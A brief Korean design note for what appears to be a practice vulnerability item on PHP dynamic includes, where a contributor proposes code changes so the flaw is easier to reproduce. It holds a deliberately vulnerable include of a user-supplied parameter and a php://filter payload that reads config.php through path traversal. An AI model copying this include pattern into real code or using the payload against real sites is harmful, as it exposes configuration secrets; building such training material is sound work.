동적 include

[item4]

<?
include "color_setting/$owner.php";
?>

IDEA from @marnitto

[marnitto]

취약점 재현을 조금 더 쉽게 하려면 아래처럼 코드를 바꾸는 게 좋을 것 같습니다.

<?php
chdir('color_setting');
include "$owner.php";

이렇게 하면, /?owner=php://filter/read=string.rot13/resource=../config 으로 config.php를 읽을 수 있습니다.